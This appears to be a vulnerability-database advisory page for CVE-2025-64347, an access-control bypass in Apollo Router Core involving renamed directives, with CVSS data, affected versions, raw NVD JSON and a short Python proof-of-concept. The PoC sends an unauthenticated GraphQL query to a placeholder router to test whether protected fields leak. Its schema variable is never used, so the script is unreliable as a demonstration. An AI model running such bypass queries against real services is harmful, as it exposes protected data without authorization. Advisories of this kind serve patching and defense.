Security Vulnerability Report
中文
CVE-2025-64347 CVSS 7.5 HIGH

CVE-2025-64347

Published: 2025-11-07 18:15:37
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Apollo Router Core is a configurable Rust graph router written to run a federated supergraph using Apollo Federation 2. Versions 1.61.12-rc.0 and below and 2.8.1-rc.0 allow unauthorized access to protected data through schema elements with access control directives (@authenticated, @requiresScopes, and @policy) that were renamed via @link imports. Router did not enforce renamed access control directives on schema elements (e.g. fields and types), allowing queries to bypass those element-level access controls. This issue is fixed in versions 1.61.12 and 2.8.1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Apollo Router Core < 1.61.12 (1.61.12-rc.0及以下版本)
Apollo Router Core < 2.8.1 (2.8.1-rc.0及以下版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64347 PoC - Apollo Router Core Access Control Bypass # This PoC demonstrates how renamed @authenticated directive can bypass access control # Step 1: Create a malicious subgraph schema with renamed access control directive MALICIOUS_SCHEMA = ''' extend schema @link(url: "https://specs.apollo.dev/federation/v2.3", import: [{name: "@authenticated", as: "@customAuth"}]) type Query { sensitiveData: ProtectedData } type ProtectedData @key(fields: "id") { id: ID! secretInfo: String @customAuth # Renamed directive, bypasses router check } ''' # Step 2: Craft GraphQL query to exploit the vulnerability EXPLOIT_QUERY = ''' query { sensitiveData { id secretInfo # This should require authentication but bypasses check } } ''' # Step 3: Send unauthenticated request to Apollo Router import requests router_url = "http://target-apollo-router:4000" response = requests.post( f"{router_url}/graphql", json={"query": EXPLOIT_QUERY}, headers={"Content-Type": "application/json"} ) # Expected: Should return 401/403 but due to bug returns data if response.status_code == 200 and "secretInfo" in response.text: print("VULNERABLE: Access control bypassed - sensitive data leaked!") else: print("PATCHED: Access control properly enforced")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64347", "sourceIdentifier": "[email protected]", "published": "2025-11-07T18:15:37.313", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Apollo Router Core is a configurable Rust graph router written to run a federated supergraph using Apollo Federation 2. Versions 1.61.12-rc.0 and below and 2.8.1-rc.0 allow unauthorized access to protected data through schema elements with access control directives (@authenticated, @requiresScopes, and @policy) that were renamed via @link imports. Router did not enforce renamed access control directives on schema elements (e.g. fields and types), allowing queries to bypass those element-level access controls. This issue is fixed in versions 1.61.12 and 2.8.1."}, {"lang": "es", "value": "Apollo Router Core es un router de grafo configurable en Rust escrito para ejecutar un supergrafo federado usando Apollo Federation 2. Las versiones 1.61.12-rc.0 e inferiores y 2.8.1-rc.0 permiten el acceso no autorizado a datos protegidos a través de elementos de esquema con directivas de control de acceso (@authenticated, @requiresScopes y @policy) que fueron renombrados a través de importaciones @link. El router no aplicaba las directivas de control de acceso renombradas en elementos de esquema (p. ej., campos y tipos), permitiendo que las consultas eludieran esos controles de acceso a nivel de elemento. Este problema se corrige en las versiones 1.61.12 y 2.8.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/apollographql/router/commit/78e4b20a2fc26cc5f141aa47992ed85375266a2b", "source": "[email protected]"}, {"url": "https://github.com/apollographql/router/security/advisories/GHSA-g8jh-vg5j-4h3f", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.